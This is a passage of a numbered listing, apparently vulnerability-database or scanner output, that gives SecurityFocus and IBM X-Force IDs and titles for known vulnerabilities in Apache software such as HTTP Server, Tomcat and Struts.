11716| [15834] Apache 'mod_imap' Referer Cross-Site Scripting Vulnerability
11717| [15765] Apache James Spooler Memory Leak Denial Of Service Vulnerability
11718| [15762] Apache MPM Worker.C Denial Of Service Vulnerability
11719| [15512] Apache Struts Error Response Cross-Site Scripting Vulnerability
11720| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
11721| [15325] Apache Tomcat Simultaneous Directory Listing Denial Of Service Vulnerability
11722| [15224] Apache Mod_Auth_Shadow Authentication Bypass Vulnerability
11723| [15177] PHP Apache 2 Local Denial of Service Vulnerability
11724| [14982] ApacheTop Insecure Temporary File Creation Vulnerability
11725| [14721] Apache Mod_SSL SSLVerifyClient Restriction Bypass Vulnerability
11726| [14660] Apache CGI Byterange Request Denial of Service Vulnerability
11727| [14366] Apache mod_ssl CRL Handling Off-By-One Buffer Overflow Vulnerability
11728| [14106] Apache HTTP Request Smuggling Vulnerability
11729| [13778] Apache HTPasswd Password Command Line Argument Buffer Overflow Vulnerability
11730| [13777] Apache HTPasswd User Command Line Argument Buffer Overflow Vulnerability
11731| [13756] Apache Tomcat Java Security Manager Bypass Vulnerability
11732| [13537] Apache HTDigest Realm Command Line Argument Buffer Overflow Vulnerability
11733| [12877] Apache mod_ssl ssl_io_filter_cleanup Remote Denial Of Service Vulnerability
11734| [12795] Apache Tomcat Remote Malformed Request Denial Of Service Vulnerability
11735| [12619] Apache Software Foundation Batik Squiggle Browser Access Validation Vulnerability
11736| [12519] Apache mod_python Module Publisher Handler Information Disclosure Vulnerability
11737| [12308] Apache Utilities Insecure Temporary File Creation Vulnerability
11738| [12217] Apache mod_auth_radius Malformed RADIUS Server Reply Integer Overflow Vulnerability
11739| [12181] Mod_DOSEvasive Apache Module Local Insecure Temporary File Creation Vulnerability
11740| [11803] Apache Jakarta Results.JSP Remote Cross-Site Scripting Vulnerability
11741| [11471] Apache mod_include Local Buffer Overflow Vulnerability
11742| [11360] Apache mod_ssl SSLCipherSuite Restriction Bypass Vulnerability
11743| [11239] Apache Satisfy Directive Access Control Bypass Vulnerability
11744| [11187] Apache Web Server Remote IPv6 Buffer Overflow Vulnerability
11745| [11185] Apache Mod_DAV LOCK Denial Of Service Vulnerability
11746| [11182] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
11747| [11154] Apache mod_ssl Remote Denial of Service Vulnerability
11748| [11094] Apache mod_ssl Denial Of Service Vulnerability
11749| [10789] Apache mod_userdir Module Information Disclosure Vulnerability
11750| [10736] Apache 'mod_ssl' Log Function Format String Vulnerability
11751| [10619] Apache ap_escape_html Memory Allocation Denial Of Service Vulnerability
11752| [10508] Apache Mod_Proxy Remote Negative Content-Length Buffer Overflow Vulnerability
11753| [10478] ClueCentral Apache Suexec Patch Security Weakness
11754| [10355] Apache 'mod_ssl' 'ssl_util_uuencode_binary()' Stack Buffer Overflow Vulnerability
11755| [10212] Apache mod_auth Malformed Password Potential Memory Corruption Vulnerability
11756| [9933] Apache mod_disk_cache Module Client Authentication Credential Storage Weakness
11757| [9930] Apache Error and Access Logs Escape Sequence Injection Vulnerability
11758| [9921] Apache Connection Blocking Denial Of Service Vulnerability
11759| [9885] Apache Mod_Security Module SecFilterScanPost Off-By-One Buffer Overflow Vulnerability
11760| [9874] Apache HTAccess LIMIT Directive Bypass Configuration Error Weakness
11761| [9829] Apache Mod_Access Access Control Rule Bypass Vulnerability
11762| [9826] Apache Mod_SSL HTTP Request Remote Denial Of Service Vulnerability
11763| [9733] Apache Cygwin Directory Traversal Vulnerability
11764| [9599] Apache mod_php Global Variables Information Disclosure Weakness
11765| [9590] Apache-SSL Client Certificate Forging Vulnerability
11766| [9571] Apache mod_digest Client-Supplied Nonce Verification Vulnerability
11767| [9471] Apache mod_perl Module File Descriptor Leakage Vulnerability
11768| [9404] Mod-Auth-Shadow Apache Module Expired User Credential Weakness
11769| [9302] Apache mod_php Module File Descriptor Leakage Vulnerability
11770| [9129] Apache mod_python Module Malformed Query Denial of Service Vulnerability
11771| [8926] Apache Web Server mod_cgid Module CGI Data Redirection Vulnerability
11772| [8919] Apache Mod_Security Module Heap Corruption Vulnerability
11773| [8911] Apache Web Server Multiple Module Local Buffer Overflow Vulnerability
11774| [8898] Red Hat Apache Directory Index Default Configuration Error
11775| [8883] Apache Cocoon Directory Traversal Vulnerability
11776| [8824] Apache Tomcat Non-HTTP Request Denial Of Service Vulnerability
11777| [8822] Apache Mod_Throttle Module Local Shared Memory Corruption Vulnerability
11778| [8725] Apache2 MOD_CGI STDERR Denial Of Service Vulnerability
11779| [8707] Apache htpasswd Password Entropy Weakness
11780| [8561] Apache::Gallery Insecure Local File Storage Privilege Escalation Vulnerability
11781| [8287] Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
11782| [8226] Apache HTTP Server Multiple Vulnerabilities
11783| [8138] Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
11784| [8137] Apache Web Server Prefork MPM Denial Of Service Vulnerability
11785| [8136] Macromedia Apache Web Server Encoded Space Source Disclosure Vulnerability
11786| [8135] Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
11787| [8134] Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
11788| [7768] Apache Tomcat Insecure Directory Permissions Vulnerability
11789| [7725] Apache Basic Authentication Module Valid User Login Denial Of Service Vulnerability
11790| [7723] Apache APR_PSPrintf Memory Corruption Vulnerability
11791| [7448] Apache Mod_Auth_Any Remote Command Execution Vulnerability
11792| [7375] Apache Mod_Access_Referer NULL Pointer Dereference Denial of Service Vulnerability
11793| [7332] Apache Web Server OS2 Filestat Denial Of Service Vulnerability
11794| [7255] Apache Web Server File Descriptor Leakage Vulnerability
11795| [7254] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
11796| [6943] Apache Web Server MIME Boundary Information Disclosure Vulnerability
11797| [6939] Apache Web Server ETag Header Information Disclosure Weakness
11798| [6722] Apache Tomcat Web.XML File Contents Disclosure Vulnerability
11799| [6721] Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
11800| [6720] Apache Tomcat Example Web Application Cross Site Scripting Vulnerability
11801| [6662] Apache Web Server MS-DOS Device Name Denial Of Service Vulnerability
11802| [6661] Apache Web Server Default Script Mapping Bypass Vulnerability
11803| [6660] Apache Web Server Illegal Character HTTP Request File Disclosure Vulnerability
11804| [6659] Apache Web Server MS-DOS Device Name Arbitrary Code Execution Vulnerability
11805| [6562] Apache Tomcat Invoker Servlet File Disclosure Vulnerability
11806| [6320] Apache/Tomcat Mod_JK Chunked Encoding Denial Of Service Vulnerability
11807| [6117] Apache mod_php File Descriptor Leakage Vulnerability
11808| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
11809| [5996] Apache AB.C Web Benchmarking Buffer Overflow Vulnerability
11810| [5995] Apache AB.C Web Benchmarking Read_Connection() Buffer Overflow Vulnerability
11811| [5993] Multiple Apache HTDigest Buffer Overflow Vulnerabilities
11812| [5992] Apache HTDigest Insecure Temporary File Vulnerability
11813| [5991] Apache HTDigest Arbitrary Command Execution Vulnerability
11814| [5990] Apache HTPasswd Insecure Temporary File Vulnerability
11815| [5981] Multiple Apache HTDigest and HTPassWD Component Vulnerabilites
11816| [5884] Apache Web Server Scoreboard Memory Segment Overwriting SIGUSR1 Sending Vulnerability
11817| [5847] Apache Server Side Include Cross Site Scripting Vulnerability
11818| [5838] Apache Tomcat 3.2 Directory Disclosure Vulnerability
11819| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
11820| [5791] HP VirtualVault Apache mod_ssl Denial Of Service Vulnerability
11821| [5787] Apache Oversized STDERR Buffer Denial Of Service Vulnerability
11822| [5786] Apache Tomcat DefaultServlet File Disclosure Vulnerability
11823| [5542] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
11824| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
11825| [5485] Apache 2.0 Path Disclosure Vulnerability
11826| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
11827| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
11828| [5194] Apache Tomcat DOS Device Name Cross Site Scripting Vulnerability
11829| [5193] Apache Tomcat Servlet Mapping Cross Site Scripting Vulnerability
11830| [5067] Apache Tomcat Null Character Malformed Request Denial Of Service Vulnerability
11831| [5054] Apache Tomcat Web Root Path Disclosure Vulnerability
11832| [5033] Apache Chunked-Encoding Memory Corruption Vulnerability
11833| [4995] Apache Tomcat JSP Engine Denial of Service Vulnerability
11834| [4878] Apache Tomcat RealPath.JSP Malformed Request Information Disclosure Vulnerability
11835| [4877] Apache Tomcat Example Files Web Root Path Disclosure Vulnerability
11836| [4876] Apache Tomcat Source.JSP Malformed Request Information Disclosure Vulnerability
11837| [4575] Apache Tomcat Servlet Path Disclosure Vulnerability
11838| [4557] Apache Tomcat System Path Information Disclosure Vulnerability
11839| [4437] Apache Error Message Cross-Site Scripting Vulnerability
11840| [4431] Apache PrintEnv/Test_CGI Script Injection Vulnerability
11841| [4358] Apache Double-Reverse Lookup Log Entry Spoofing Vulnerability
11842| [4335] Apache Win32 Batch File Remote Command Execution Vulnerability
11843| [4292] Oracle 9iAS Apache PL/SQL Module Web Administration Access Vulnerability
11844| [4189] Apache mod_ssl/Apache-SSL Buffer Overflow Vulnerability
11845| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
11846| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
11847| [4037] Oracle 9iAS Apache PL/SQL Module Denial of Service Vulnerability
11848| [4032] Oracle 9iAS Apache PL/SQL Module Multiple Buffer Overflows Vulnerability
11849| [3796] Apache HTTP Request Unexpected Behavior Vulnerability
11850| [3790] Apache Non-Existent Log Directory Denial Of Service Vulnerability
11851| [3786] Apache Win32 PHP.EXE Remote File Disclosure Vulnerability
11852| [3727] Oracle 9I Application Server PL/SQL Apache Module Directory Traversal Vulnerability
11853| [3726] Oracle 9I Application Server PL/SQL Apache Module Buffer Overflow Vulnerability
11854| [3596] Apache Split-Logfile File Append Vulnerability
11855| [3521] Apache mod_usertrack Predictable ID Generation Vulnerability
11856| [3335] Red Hat Linux Apache Remote Username Enumeration Vulnerability
11857| [3316] MacOS X Client Apache Directory Contents Disclosure Vulnerability
11858| [3256] Apache mod_auth_oracle Remote SQL Query Manipulation Vulnerability
11859| [3255] Apache mod_auth_mysql Remote SQL Query Manipulation Vulnerability
11860| [3254] Apache AuthPG Remote SQL Query Manipulation Vulnerability
11861| [3253] Apache mod_auth_pgsql_sys Remote SQL Query Manipulation Vulnerability
11862| [3251] Apache mod_auth_pgsql Remote SQL Query Manipulation Vulnerability
11863| [3176] Apache Mod ReWrite Rules Bypassing Image Linking Vulnerability
11864| [3169] Apache Server Address Disclosure Vulnerability
11865| [3009] Apache Possible Directory Index Disclosure Vulnerability
11866| [2982] Apache Tomcat Cross-Site Scripting Vulnerability
11867| [2852] MacOS X Client Apache File Protection Bypass Vulnerability
11868| [2740] Apache Web Server HTTP Request Denial of Service Vulnerability
11869| [2518] Apache Tomcat 3.0 Directory Traversal Vulnerability
11870| [2503] Apache Artificially Long Slash Path Directory Listing Vulnerability
11871| [2300] NCSA/Apache httpd ScriptAlias Source Retrieval Vulnerability
11872| [2216] Apache Web Server DoS Vulnerability
11873| [2182] Apache /tmp File Race Vulnerability
11874| [2171] Oracle Apache+WebDB Documented Backdoor Vulnerability
11875| [2060] Apache Web Server with Php 3 File Disclosure Vulnerability
11876| [1821] Apache mod_cookies Buffer Overflow Vulnerability
11877| [1728] Apache Rewrite Module Arbitrary File Disclosure Vulnerability
11878| [1658] SuSE Apache CGI Source Code Viewing Vulnerability
11879| [1656] SuSE Apache WebDAV Directory Listings Vulnerability
11880| [1575] Trustix Apache-SSL RPM Permissions Vulnerability
11881| [1548] Apache Jakarta-Tomcat /admin Context Vulnerability
11882| [1532] Apache Tomcat Snoop Servlet Information Disclosure Vulnerability
11883| [1531] Apache Tomcat 3.1 Path Revealing Vulnerability
11884| [1457] Apache::ASP source.asp Example Script Vulnerability
11885| [1284] Apache HTTP Server (win32) Root Directory Access Vulnerability
11886| [1083] Cobalt Raq Apache .htaccess Disclosure Vulnerability
11887|
11888| IBM X-Force - https://exchange.xforce.ibmcloud.com:
11889| [86258] Apache CloudStack text fields cross-site scripting
11890| [85983] Apache Subversion mod_dav_svn module denial of service
11891| [85875] Apache OFBiz UEL code execution
11892| [85874] Apache OFBiz Webtools View Log screen cross-site scripting
11893| [85871] Apache HTTP Server mod_session_dbd unspecified
11894| [85756] Apache Struts OGNL expression command execution
11895| [85755] Apache Struts DefaultActionMapper class open redirect
11896| [85586] Apache ActiveMQ CVE-2013-1879 cross-site scripting
11897| [85574] Apache HTTP Server mod_dav denial of service
11898| [85573] Apache Struts Showcase App OGNL code execution
11899| [85496] Apache CXF denial of service
11900| [85423] Apache Geronimo RMI classloader code execution
11901| [85326] Apache Santuario XML Security for C++ buffer overflow
11902| [85323] Apache Santuario XML Security for Java spoofing
11903| [85319] Apache Qpid Python client SSL spoofing
11904| [85019] Apache Santuario XML Security for C++ CVE-2013-2156 buffer overflow
11905| [85018] Apache Santuario XML Security for C++ CVE-2013-2155 denial of service
11906| [85017] Apache Santuario XML Security for C++ CVE-2013-2154 buffer overflow
11907| [85016] Apache Santuario XML Security for C++ CVE-2013-2153 spoofing
11908| [84952] Apache Tomcat CVE-2012-3544 denial of service
11909| [84763] Apache Struts CVE-2013-2135 security bypass
11910| [84762] Apache Struts CVE-2013-2134 security bypass
11911| [84719] Apache Subversion CVE-2013-2088 command execution
11912| [84718] Apache Subversion CVE-2013-2112 denial of service
11913| [84717] Apache Subversion CVE-2013-1968 denial of service
11914| [84577] Apache Tomcat security bypass
11915| [84576] Apache Tomcat symlink
11916| [84543] Apache Struts CVE-2013-2115 security bypass
11917| [84542] Apache Struts CVE-2013-1966 security bypass
11918| [84154] Apache Tomcat session hijacking
11919| [84144] Apache Tomcat denial of service
11920| [84143] Apache Tomcat information disclosure
11921| [84111] Apache HTTP Server command execution
11922| [84043] Apache Virtual Computing Lab cross-site scripting
11923| [84042] Apache Virtual Computing Lab cross-site scripting
11924| [83782] Apache CloudStack information disclosure
11925| [83781] Apache CloudStack security bypass
11926| [83720] Apache ActiveMQ cross-site scripting
11927| [83719] Apache ActiveMQ denial of service
11928| [83718] Apache ActiveMQ denial of service
11929| [83263] Apache Subversion denial of service
11930| [83262] Apache Subversion denial of service
11931| [83261] Apache Subversion denial of service
11932| [83259] Apache Subversion denial of service
11933| [83035] Apache mod_ruid2 security bypass
11934| [82852] Apache Qpid federation_tag security bypass
11935| [82851] Apache Qpid qpid::framing::Buffer denial of service
11936| [82758] Apache Rave User RPC API information disclosure
11937| [82663] Apache Subversion svn_fs_file_length() denial of service
11938| [82642] Apache Qpid qpid::framing::Buffer::checkAvailable() denial of service
11939| [82641] Apache Qpid AMQP denial of service
11940| [82626] Apache HTTP Server on Debian GNU/Linux Debian apache2ctl symlink
11941| [82618] Apache Commons FileUpload symlink
11942| [82360] Apache HTTP Server manager interface cross-site scripting
11943| [82359] Apache HTTP Server hostnames cross-site scripting
11944| [82338] Apache Tomcat log/logdir information disclosure
11945| [82328] Apache Maven and Apache Maven Wagon SSL spoofing
11946| [82268] Apache OpenJPA deserialization command execution
11947| [81981] Apache CXF UsernameTokens security bypass
11948| [81980] Apache CXF WS-Security security bypass
11949| [81398] Apache OFBiz cross-site scripting
11950| [81240] Apache CouchDB directory traversal
11951| [81226] Apache CouchDB JSONP code execution
11952| [81225] Apache CouchDB Futon user interface cross-site scripting
11953| [81211] Apache Axis2/C SSL spoofing
11954| [81167] Apache CloudStack DeployVM information disclosure
11955| [81166] Apache CloudStack AddHost API information disclosure
11956| [81165] Apache CloudStack createSSHKeyPair API information disclosure
11957| [80518] Apache Tomcat cross-site request forgery security bypass
11958| [80517] Apache Tomcat FormAuthenticator security bypass
11959| [80516] Apache Tomcat NIO denial of service
11960| [80408] Apache Tomcat replay-countermeasure security bypass
11961| [80407] Apache Tomcat HTTP Digest Access Authentication security bypass
11962| [80317] Apache Tomcat slowloris denial of service
11963| [79984] Apache Commons HttpClient SSL spoofing
11964| [79983] Apache CXF SSL spoofing
11965| [79830] Apache Axis2/Java SSL spoofing
11966| [79829] Apache Axis SSL spoofing
11967| [79809] Apache Tomcat DIGEST security bypass
11968| [79806] Apache Tomcat parseHeaders() denial of service
11969| [79540] Apache OFBiz unspecified
11970| [79487] Apache Axis2 SAML security bypass
11971| [79212] Apache Cloudstack code execution
11972| [78734] Apache CXF SOAP Action security bypass
11973| [78730] Apache Qpid broker denial of service
11974| [78617] Eucalyptus Apache Santuario (XML Security for Java) denial of service
11975| [78563] Apache mod_pagespeed module unspecified cross-site scripting
11976| [78562] Apache mod_pagespeed module security bypass
11977| [78454] Apache Axis2 security bypass
11978| [78452] Websense Web Security and Web Filter Apache Tomcat information disclosure
11979| [78451] Websense Web Security and Web Filter Apache Tomcat cross-site scripting
11980| [78321] Apache Wicket unspecified cross-site scripting
11981| [78183] Apache Struts parameters denial of service
11982| [78182] Apache Struts cross-site request forgery
11983| [78153] Apache Solr Autocomplete module for Drupal autocomplete results cross-site scripting
11984| [77987] mod_rpaf module for Apache denial of service
11985| [77958] Apache Struts skill name code execution
11986| [77914] Apache HTTP Server mod_negotiation module cross-site scripting
11987| [77913] Apache HTTP Server mod_proxy_ajp information disclosure
11988| [77568] Apache Qpid broker security bypass
11989| [77421] Apache Libcloud spoofing
11990| [77059] Oracle Solaris Cluster Apache Tomcat Agent unspecified
11991| [77046] Oracle Solaris Apache HTTP Server information disclosure
11992| [76837] Apache Hadoop information disclosure
11993| [76802] Apache Sling CopyFrom denial of service
11994| [76692] Apache Hadoop symlink
11995| [76535] Apache Roller console cross-site request forgery
11996| [76534] Apache Roller weblog cross-site scripting
11997| [76152] Apache CXF elements security bypass
11998| [76151] Apache CXF child policies security bypass
11999| [75983] MapServer for Windows Apache file include
12000| [75857] Apache Commons Compress and Apache Ant bzip2 denial of service
12001| [75558] Apache POI denial of service
12002| [75545] PHP apache_request_headers() buffer overflow
12003| [75302] Apache Qpid SASL security bypass
12004| [75211] Debian GNU/Linux apache 2 cross-site scripting
12005| [74901] Apache HTTP Server LD_LIBRARY_PATH privilege escalation
12006| [74871] Apache OFBiz FlexibleStringExpander code execution
12007| [74870] Apache OFBiz multiple cross-site scripting
12008| [74750] Apache Hadoop unspecified spoofing
12009| [74319] Apache Struts XSLTResult.java file upload
12010| [74313] Apache Traffic Server header buffer overflow
12011| [74276] Apache Wicket directory traversal
12012| [74273] Apache Wicket unspecified cross-site scripting
12013| [74181] Apache HTTP Server mod_fcgid module denial of service
12014| [73690] Apache Struts OGNL code execution
12015| [73432] Apache Solr extension for TYPO3 unspecified cross-site scripting
12016| [73100] Apache MyFaces in directory traversal
12017| [73096] Apache APR hash denial of service
12018| [73052] Apache Struts name cross-site scripting
12019| [73030] Apache CXF UsernameToken security bypass
12020| [72888] Apache Struts lastName cross-site scripting
12021| [72758] Apache HTTP Server httpOnly information disclosure
12022| [72757] Apache HTTP Server MPM denial of service
12023| [72585] Apache Struts ParameterInterceptor security bypass
12024| [72438] Apache Tomcat Digest security bypass
12025| [72437] Apache Tomcat Digest security bypass
12026| [72436] Apache Tomcat DIGEST security bypass
12027| [72425] Apache Tomcat parameter denial of service
12028| [72422] Apache Tomcat request object information disclosure
12029| [72377] Apache HTTP Server scoreboard security bypass
12030| [72345] Apache HTTP Server HTTP request denial of service
12031| [72229] Apache Struts ExceptionDelegator command execution
12032| [72089] Apache Struts ParameterInterceptor directory traversal
12033| [72088] Apache Struts CookieInterceptor command execution
12034| [72047] Apache Geronimo hash denial of service
12035| [72016] Apache Tomcat hash denial of service
12036| [71711] Apache Struts OGNL expression code execution
12037| [71654] Apache Struts interfaces security bypass
12038| [71620] Apache ActiveMQ failover denial of service
12039| [71617] Apache HTTP Server mod_proxy module information disclosure
12040| [71508] Apache MyFaces EL security bypass
12041| [71445] Apache HTTP Server mod_proxy security bypass
12042| [71203] Apache Tomcat servlets privilege escalation
12043| [71181] Apache HTTP Server ap_pregsub() denial of service
12044| [71093] Apache HTTP Server ap_pregsub() buffer overflow
12045| [70336] Apache HTTP Server mod_proxy information disclosure
12046| [69804] Apache HTTP Server mod_proxy_ajp denial of service
12047| [69472] Apache Tomcat AJP security bypass
12048| [69396] Apache HTTP Server ByteRange filter denial of service
12049| [69394] Apache Wicket multi window support cross-site scripting
12050| [69176] Apache Tomcat XML information disclosure
12051| [69161] Apache Tomcat jsvc information disclosure
12052| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
12053| [68541] Apache Tomcat sendfile information disclosure
12054| [68420] Apache XML Security denial of service
12055| [68238] Apache Tomcat JMX information disclosure
12056| [67860] Apache Rampart/C rampart_timestamp_token_validate security bypass
12057| [67804] Apache Subversion control rules information disclosure
12058| [67803] Apache Subversion control rules denial of service
12059| [67802] Apache Subversion baselined denial of service
12060| [67672] Apache Archiva multiple cross-site scripting
12061| [67671] Apache Archiva multiple cross-site request forgery
12062| [67564] Apache APR apr_fnmatch() denial of service
12063| [67532] IBM WebSphere Application Server org.apache.jasper.runtime.JspWriterImpl.response denial of service
12064| [67515] Apache Tomcat annotations security bypass
12065| [67480] Apache Struts s:submit information disclosure
12066| [67414] Apache APR apr_fnmatch() denial of service
12067| [67356] Apache Struts javatemplates cross-site scripting
12068| [67354] Apache Struts Xwork cross-site scripting
12069| [66676] Apache Tomcat HTTP BIO information disclosure
12070| [66675] Apache Tomcat web.xml security bypass
12071| [66640] Apache HttpComponents HttpClient Proxy-Authorization information disclosure
12072| [66241] Apache HttpComponents information disclosure
12073| [66154] Apache Tomcat ServletSecurity security bypass
12074| [65971] Apache Tomcat ServletSecurity security bypass
12075| [65876] Apache Subversion mod_dav_svn denial of service
12076| [65343] Apache Continuum unspecified cross-site scripting
12077| [65162] Apache Tomcat NIO connector denial of service
12078| [65161] Apache Tomcat javax.servlet.ServletRequest.getLocale() denial of service
12079| [65160] Apache Tomcat HTML Manager interface cross-site scripting
12080| [65159] Apache Tomcat ServletContect security bypass
12081| [65050] Apache CouchDB web-based administration UI cross-site scripting
12082| [64773] Oracle HTTP Server Apache Plugin unauthorized access
12083| [64473] Apache Subversion blame -g denial of service
12084| [64472] Apache Subversion walk() denial of service
12085| [64407] Apache Axis2 CVE-2010-0219 code execution
12086| [63926] Apache Archiva password privilege escalation
12087| [63785] Apache CouchDB LD_LIBRARY_PATH privilege escalation
12088| [63493] Apache Archiva credentials cross-site request forgery
12089| [63477] Apache Tomcat HttpOnly session hijacking
12090| [63422] Apache Tomcat sessionsList.jsp cross-site scripting
12091| [63303] Apache mod_fcgid module fcgid_header_bucket_read() buffer overflow
12092| [62959] Apache Shiro filters security bypass
12093| [62790] Apache Perl cgi module denial of service
12094| [62576] Apache Qpid exchange denial of service
12095| [62575] Apache Qpid AMQP denial of service
12096| [62354] Apache Qpid SSL denial of service
12097| [62235] Apache APR-util apr_brigade_split_line() denial of service
12098| [62181] Apache XML-RPC SAX Parser information disclosure
12099| [61721] Apache Traffic Server cache poisoning
12100| [61202] Apache Derby BUILTIN authentication functionality information disclosure
12101| [61186] Apache CouchDB Futon cross-site request forgery
12102| [61169] Apache CXF DTD denial of service
12103| [61070] Apache Jackrabbit search.jsp SQL injection
12104| [61006] Apache SLMS Quoting cross-site request forgery
12105| [60962] Apache Tomcat time cross-site scripting
12106| [60883] Apache mod_proxy_http information disclosure
12107| [60671] Apache HTTP Server mod_cache and mod_dav denial of service
12108| [60264] Apache Tomcat Transfer-Encoding denial of service
12109| [59746] Apache Axis2 axis2/axis2-admin page session hijacking
12110| [59588] Apache Axis2/Java XML DTD (Document Type Declaration) data denial of service
12111| [59413] Apache mod_proxy_http timeout information disclosure
12112| [59058] Apache MyFaces unencrypted view state cross-site scripting
12113| [58827] Apache Axis2 xsd file include
12114| [58790] Apache Axis2 modules cross-site scripting
12115| [58299] Apache ActiveMQ queueBrowse cross-site scripting
12116| [58169] Apache Tomcat Web Application Manager / Host Manager cross-site request forgery
12117| [58056] Apache ActiveMQ .jsp source code disclosure
12118| [58055] Apache Tomcat realm name information disclosure
12119| [58046] Apache HTTP Server mod_auth_shadow security bypass
12120| [57841] Apache Open For Business Project (OFBiz) subject cross-site scripting
12121| [57840] Apache Open For Business Project (OFBiz) multiple parameters cross-site scripting
12122| [57429] Apache CouchDB algorithms information disclosure
12123| [57398] Apache ActiveMQ Web console cross-site request forgery
12124| [57397] Apache ActiveMQ createDestination.action cross-site scripting
12125| [56653] Apache HTTP Server DNS spoofing
12126| [56652] Apache HTTP Server DNS cross-site scripting
12127| [56625] Apache HTTP Server request header information disclosure
12128| [56624] Apache HTTP Server mod_isapi orphaned callback pointer code execution
12129| [56623] Apache HTTP Server mod_proxy_ajp denial of service
12130| [55941] mod_proxy module for Apache ap_proxy_send_fb() buffer overflow
12131| [55857] Apache Tomcat WAR files directory traversal
12132| [55856] Apache Tomcat autoDeploy attribute security bypass
12133| [55855] Apache Tomcat WAR directory traversal
12134| [55210] Intuit component for Joomla! Apache information disclosure
12135| [54533] Apache Tomcat 404 error page cross-site scripting
12136| [54182] Apache Tomcat admin default password
12137| [53878] Apache Solr Search (solr) extension for TYPO3 unspecified cross-site scripting
12138| [53666] Apache HTTP Server Solaris pollset support denial of service
12139| [53650] Apache HTTP Server HTTP basic-auth module security bypass
12140| [53124] mod_proxy_ftp module for Apache HTTP header security bypass
12141| [53041] mod_proxy_ftp module for Apache denial of service
12142| [52540] Apache Portable Runtime and Apache Portable Utility library multiple buffer overflow
12143| [51953] Apache Tomcat Path Disclosure
12144| [51952] Apache Tomcat Path Traversal
12145| [51951] Apache stronghold-status Information Disclosure
12146| [51950] Apache stronghold-info Information Disclosure
12147| [51949] Apache PHP Source Code Disclosure
12148| [51948] Apache Multiviews Attack
12149| [51946] Apache JServ Environment Status Information Disclosure
12150| [51945] Apache error_log Information Disclosure
12151| [51944] Apache Default Installation Page Pattern Found
12152| [51943] Apache AXIS XML Parser echoheaders.jws Sample Web Service Denial of Service
12153| [51942] Apache AXIS XML External Entity File Retrieval
12154| [51941] Apache AXIS Sample Servlet Information Leak
12155| [51940] Apache access_log Information Disclosure
12156| [51626] Apache mod_deflate denial of service
12157| [51532] mod_proxy module for the Apache HTTP Server stream_reqbody_cl denial of service
12158| [51365] Apache Tomcat RequestDispatcher security bypass
12159| [51273] Apache HTTP Server Incomplete Request denial of service
12160| [51195] Apache Tomcat XML information disclosure
12161| [50994] Apache APR-util xml/apr_xml.c denial of service
12162| [50993] Apache APR-util apr_brigade_vprintf denial of service
12163| [50964] Apache APR-util apr_strmatch_precompile() denial of service
12164| [50930] Apache Tomcat j_security_check information disclosure
12165| [50928] Apache Tomcat AJP denial of service
12166| [50884] Apache HTTP Server XML ENTITY denial of service
12167| [50808] Apache HTTP Server AllowOverride privilege escalation
12168| [50108] Apache Struts s:a tag and s:url tag cross-site scripting
12169| [50059] Apache mod_proxy_ajp information disclosure
12170| [49951] Apache Tiles Expression Language (EL) expressions cross-site scripting
12171| [49925] Apache Geronimo Web Administrative Console cross-site request forgery
12172| [49924] Apache Geronimo console/portal/Server/Monitoring cross-site scripting
12173| [49921] Apache ActiveMQ Web interface cross-site scripting
12174| [49898] Apache Geronimo Services/Repository directory traversal
12175| [49725] Apache Tomcat mod_jk module information disclosure
12176| [49715] Apache mod_perl Apache::Status and Apache2::Status modules cross-site scripting
12177| [49712] Apache Struts unspecified cross-site scripting
12178| [49213] Apache Tomcat cal2.jsp cross-site scripting
12179| [48934] Apache Tomcat POST doRead method information disclosure
12180| [48211] Apache Tomcat header HTTP request smuggling
12181| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
12182| [48110] Apache Jackrabbit search.jsp and swr.jsp cross-site scripting
12183| [47709] Apache Roller "
12184| [47104] Novell Netware ApacheAdmin console security bypass
12185| [47086] Apache HTTP Server OS fingerprinting unspecified
12186| [46329] Apache Struts FilterDispatcher and DefaultStaticContentLoader class directory traversal
12187| [45791] Apache Tomcat RemoteFilterValve security bypass
12188| [44435] Oracle WebLogic Apache Connector buffer overflow
12189| [44411] Apache Tomcat allowLinking UTF-8 directory traversal
12190| [44223] Apache HTTP Server mod_proxy_ftp cross-site scripting
12191| [44156] Apache Tomcat RequestDispatcher directory traversal
12192| [44155] Apache Tomcat HttpServletResponse.sendError() cross-site scripting
12193| [43885] Oracle WebLogic Server Apache Connector buffer overflow
12194| [42987] Apache HTTP Server mod_proxy module denial of service
12195| [42915] Apache Tomcat JSP files path disclosure
12196| [42914] Apache Tomcat MS-DOS path disclosure
12197| [42892] Apache Tomcat unspecified unauthorized access
12198| [42816] Apache Tomcat Host Manager cross-site scripting
12199| [42303] Apache 403 error cross-site scripting
12200| [41618] Apache-SSL ExpandCert() authentication bypass
12201| [40761] Apache Derby RDBNAM parameter and DatabaseMetaData.getURL information disclosure
12202| [40736] Apache Tomcat HTTP/1.1 connector information disclosure
12203| [40614] Apache mod_jk2 HTTP Host header buffer overflow
12204| [40562] Apache Geronimo init information disclosure
12205| [40478] Novell Web Manager webadmin-apache.conf security bypass
12206| [40411] Apache Tomcat exception handling information disclosure
12207| [40409] Apache Tomcat native (APR based) connector weak security
12208| [40403] Apache Tomcat quotes and %5C cookie information disclosure
12209| [40388] Sun Java Plug-In org.apache.crimson.tree.XmlDocument security bypass
12210| [39893] Apache HTTP Server mod_negotiation HTTP response splitting
12211| [39867] Apache HTTP Server mod_negotiation cross-site scripting
12212| [39804] Apache Tomcat SingleSignOn information disclosure
12213| [39615] Apache HTTP Server mod_proxy_ftp.c UTF-7 cross-site scripting
